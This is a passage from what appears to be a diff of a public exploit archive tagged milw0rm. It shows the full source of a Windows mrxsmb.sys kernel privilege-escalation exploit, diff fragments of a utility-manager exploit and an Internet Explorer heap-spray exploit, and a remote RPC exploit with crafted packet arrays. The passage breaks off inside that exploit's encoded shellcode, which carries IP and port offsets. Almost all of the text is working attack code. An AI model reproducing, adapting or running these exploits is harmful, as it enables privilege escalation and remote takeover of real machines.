DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
dwTemp=CloseHandle(hDevice);
if(!dwTemp) ShowError();
dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
if(!dwTemp) ShowError();
return(1);
}
// milw0rm.com [2006-06-14]
///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000 cmp eax,000000288
//. 770B ja .000064BBE --
//. 50 push eax
//. 51 push ecx
//. E812E2FFFF call .000062DCC -- MODIFIED CALL --
// -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previosly explained but regarding to Windows 2000 Service Pack 4.
// -----------------------------------------------------------------------------------
// $OffWord
// This variable is defined in CalcJump() Function.
// E812E2FFFF call .000062DCC -- MODIFIED CALL --
// The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212.
//////////////////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
#define XPSP2 0x54BAC
#define W2KSP4 0x50ADD
#define MAGIC_IOCTL 0x141043
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName,
DWORD nSize);
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{
DWORD SumTemp;
DWORD IniAddress;
DWORD i;
DWORD sumAux;
DWORD addTemp;
DWORD OffWord;
if(InXP)
{
SumTemp=BaseMRX+XPSP2+0xE;
OffWord=0xE212;
}
else
{
SumTemp=BaseMRX+W2KSP4+0xE;
OffWord=0xa971;
}
for(i=0x4c;i<0xDDDC;i=i+4)
{
sumAux=~((i*0x10000)+OffWord);
addTemp=SumTemp-sumAux;
if(addTemp>0xE000000 && addTemp<0xF000000){
IniAddress=addTemp&0xFFFFF000;
*hValue=i-4;
*ShellAddr=addTemp;
break;
}
}
printf("\nINFORMATION \n");
printf("-----------------------------------------------------\n");
printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
return (IniAddress);
}
int main(int argc, char *argv[])
{
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx;
DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
DWORD *OutBuff,*InBuff;
HANDLE hDevice;
BOOL InXP;
CHAR baseName[255];
CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)"
if(argc<2)
{
printf("\nMRXSMB.SYS RING0 Exploit\n");
printf("--- Ruben Santamarta ---\n");
printf("Tested on XPSP2 & W2KSP4\n");
printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1);
}
if(strncmp(argv[1],"XP",2)==0)
InXP=TRUE;
else
InXP=FALSE;
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("\nSearching Mrxsmb.sys Base Address...");
for(i=1;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,254);
if((strncmp(baseName,"mrxsmb",6)==0))
{
printf("[%x] Found!\n",arrMods[i]);
BaseMRX=(DWORD)arrMods[i];
}
}
if(!BaseMRX)
{
printf("Not Found\nExiting\n\n");
exit(1);
}
addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
printf("F000h bytes allocated at \t\t [0x%p]\n",addEx);
printf("Value needed \t\t\t [0x%p]\n",hValue+4);
InBuff=OutBuff;
printf("Checking Shadow Device...");
hDevice = CreateFile("\\\\.\\shadow",
FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]\n");
printf("Querying Device...\n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP)
Ring0Addr=BaseMRX+XPSP2;
else
Ring0Addr=BaseMRX+W2KSP4;
printf("Overwritting Driver Call at[%x]...",Ring0Addr);
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]\n");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("Sending IOCTL to execute the ShellCode\n");
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
dwTemp=CloseHandle(hDevice);
if(!dwTemp) ShowError();
dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
if(!dwTemp) ShowError();
return(1);
}
// milw0rm.com [2006-06-14]

6
platforms/windows/local/352.c
View file

@ -177,6 +177,6 @@ int main(int argc, char* argv[])
SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close utilitymanager
return 0;
}
// milw0rm.com [2004-07-17]
// milw0rm.com [2004-07-17]

6
platforms/windows/remote/1144.html
View file

@ -138,6 +138,6 @@ for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT>
<object classid="CLSID:3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5"></object>
Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit
# milw0rm.com [2005-08-09]
# milw0rm.com [2005-08-09]

794
platforms/windows/remote/1352.cpp
View file

@ -1,397 +1,397 @@
/*
Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered,
so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz:
All SST guys, I love your bald heads that never hatted.
Shuo Yang, I love you.
OYXin, ...
Code by:
Swan (Swan[at]0x557[dot]org)
*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char peer0_0[72] = {
(char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a,
(char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00,
(char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 };
char peer0_1[1024] = {
(char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00 };
char peer0_2[300] = {
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xfd, (char)0xfd, (char)0xfd, (char)0xfd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd,
(char)0xdd, (char)0xdd, (char)0xdd, (char)0xdd, (char)0x24, (char)0x00, (char)0x8f, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x08, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x09, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00 };
#define ip_offset (213+22)
#define port_offset (208+22)
unsigned char realsc[] =
"\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB"
